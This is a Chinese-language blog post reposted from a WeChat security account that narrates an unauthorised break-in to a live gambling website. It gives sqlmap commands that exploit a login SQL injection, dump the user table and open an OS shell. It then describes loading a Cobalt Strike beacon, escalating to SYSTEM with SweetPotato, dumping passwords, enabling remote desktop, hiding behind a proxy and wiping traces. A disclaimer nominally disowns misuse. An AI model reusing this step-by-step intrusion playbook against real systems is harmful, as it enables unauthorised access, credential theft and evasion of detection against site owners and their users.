痛恨还是爱了?教你如何快速拿下一个BC小站

admin 2024年2月21日20:45:56评论9 views字数 1769阅读5分53秒阅读模式

免责声明

由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

0x01 概述

本文章来自知识星球成员yemur的投稿,感谢。

本次渗透仅为技术研究,请勿用于非法破坏,一切后果与我方无关。

0x02 正文

FOFA搜索

使用知识星球内部的FOFA在线搜索系统收集一些站点

搜索结果如下:

痛恨还是爱了?教你如何快速拿下一个BC小站

这里随便从其中选取一个站点做测试对象,打开页面如下

痛恨还是爱了?教你如何快速拿下一个BC小站

尝试使用弱口令登录

admin/admin
admin/123456
.....................

弱口令失败,那么开始尝试万能密码的sql注入。众所周知该类网站的登录基本上都有sql注入。那么我们现在先抓取登录的数据包。

痛恨还是爱了?教你如何快速拿下一个BC小站

其中*代表注入点,然后将其保存为sql.txt,直接用sqlmap的-r参数跑即可。不过在此之前先配置一个代理,避免暴露自己。

配置proxifier
代理来源可以使用自己的clash作为代理来源,也可以去网上专门购买代理,如快代理,这里使用是clash的代理

痛恨还是爱了?教你如何快速拿下一个BC小站

在proxfier上先添加一个代理服务器

痛恨还是爱了?教你如何快速拿下一个BC小站

其中代理端口为你clash的端口,地址为127.0.0.1,接下来配置代理规则,根据自己的需要进行配置,我这里只配置了python和chrome的代理

痛恨还是爱了?教你如何快速拿下一个BC小站

使用py测试一下代理是否配置成功,py脚本代码如下

import requests
url="http://myip.ipip.net/"
header={
    "User-Agent":"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
}
resp=requests.get(url=url,verify=False,headers=header)
resp.encoding="utf-8"
print(resp.text)

响应如下

痛恨还是爱了?教你如何快速拿下一个BC小站

接下来执行sqlmap的命令

python3 sqlmap.py -r sql.txt -D --tables --batch --threads 8

运行结果如下

痛恨还是爱了?教你如何快速拿下一个BC小站

痛恨还是爱了?教你如何快速拿下一个BC小站

接下来报表

python3 sqlmap.py -r sql.txt -D RYPlatformManagerDB --tables --batch --threads 8

痛恨还是爱了?教你如何快速拿下一个BC小站

爆字段

python3 sqlmap.py -r sql.txt -D RYPlatformManagerDB -T Base_Users --dump --batch --threads 8

痛恨还是爱了?教你如何快速拿下一个BC小站

将其密码拿到cmd5去解码

痛恨还是爱了?教你如何快速拿下一个BC小站

只因我没有小钱钱买MD5付费查询,免费站点又解不出来,gg了,换一种思路,使用sqlmap的--os-shell参数来执行命令让其上线cs

python3 sqlmap.py -r sql.txt --batch --threads 8 --os-shell

痛恨还是爱了?教你如何快速拿下一个BC小站

十分顺利,这里直接使用使用cs生成payload

痛恨还是爱了?教你如何快速拿下一个BC小站

payload类型选择如下

痛恨还是爱了?教你如何快速拿下一个BC小站

然后生成payload,将其在sqlmap中执行

痛恨还是爱了?教你如何快速拿下一个BC小站

成功上线

痛恨还是爱了?教你如何快速拿下一个BC小站

尝试提权,先使用命令查看系统信息,查看合适的提权方法

shell systeminfo

痛恨还是爱了?教你如何快速拿下一个BC小站

查找对应exp

痛恨还是爱了?教你如何快速拿下一个BC小站

这里最后发现使用SweetPotato可以成功提权,原因后面说。。。。。。。。。。。。。。。

痛恨还是爱了?教你如何快速拿下一个BC小站

使用Sweet Potato反弹一个system权限回来

痛恨还是爱了?教你如何快速拿下一个BC小站

成功反弹回system权限,那么我们按照一般的内网流程行动(大部分情况下都只是工作组),刚刚执行systeminfo时就发现这个站点不存在域,所以我们可以到此为止。。。假的,来都来了,开个3389上去看看再说。在system权限的会话中抓取密码

痛恨还是爱了?教你如何快速拿下一个BC小站

成功抓取到密码,密码强度可谓是非常之强。。。。。。20多位的密码

痛恨还是爱了?教你如何快速拿下一个BC小站

接下来使用system权限的会话开启3389即可

痛恨还是爱了?教你如何快速拿下一个BC小站

开启成功,这里就直接使用刚刚抓取到的账户和密码进行登录。登录成功

痛恨还是爱了?教你如何快速拿下一个BC小站

下面这个腾讯管家搞得我差点提权失败。。。包括上线。。。。。。

这要真是失败了就得拿出我的免杀大杀器了,可惜没有排上用场哈哈哈

痛恨还是爱了?教你如何快速拿下一个BC小站

使用各种痕迹清除工具将渗透清除(每次渗透完一定要清除痕迹),后来发现此机器并无域控,至此渗透之旅结束收工。

0x03 知识星球

痛恨还是爱了?教你如何快速拿下一个BC小站

原文始发于微信公众号(狐狸说安全):痛恨还是爱了?教你如何快速拿下一个BC小站

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月21日20:45:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   痛恨还是爱了?教你如何快速拿下一个BC小站https://cn-sec.com/archives/2512884.html

发表评论

匿名网友 填写信息